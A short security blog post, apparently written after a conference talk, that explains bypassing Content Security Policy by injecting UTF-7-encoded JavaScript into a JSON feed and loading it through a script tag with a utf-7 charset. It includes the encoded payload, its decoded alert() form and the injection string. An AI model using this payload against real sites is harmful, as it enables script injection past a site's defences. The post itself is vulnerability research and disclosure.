Bypassing CSP for fun, no profit

I had fun at Confidence 2.0 CON, I'm gonna blog about the stuff I was holding back now :)

So I figured how to bypass CSP with UTF-7 and JSON. Basically any site with a JSON feed that can be manipulated by an attacker (reflective or persistent) can be injected with even in a correctly escaped JSON feed.

Utf-7 can be fully encoded meaning that you can conceal string characters and others. 'ABC' becomes +ACcAQQBCAEMAJw-. So if we look at a fictional JSON feed such as:- [{'friend':'something',email:'something'} ]

If we can influence the "something" parts then we inject the feed with our data to bypass CSP:- [{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJw BNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdw BpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAb wBiACcAOgAnAGQAbwBuAGU-'}]

This is what the code looks like when decoded:- [{'friend':'luke','email':''}];alert('May the force be with you');[{'job':'done'}]

We then inject the data by referencing it using a script tag and a charset:-

<pre lang="javascript"> &quot;&gt;&lt;script src=&quot;http://some.website/test.json&quot; charset=&quot;utf-7&quot;&gt;&lt;/script&gt; </pre>

This successfully executes in CSP bypasing it's restrictions because the code comes from the domain itself and doesn't use in-line or attribute based XSS.

As always as demo is available here:- CSP bypass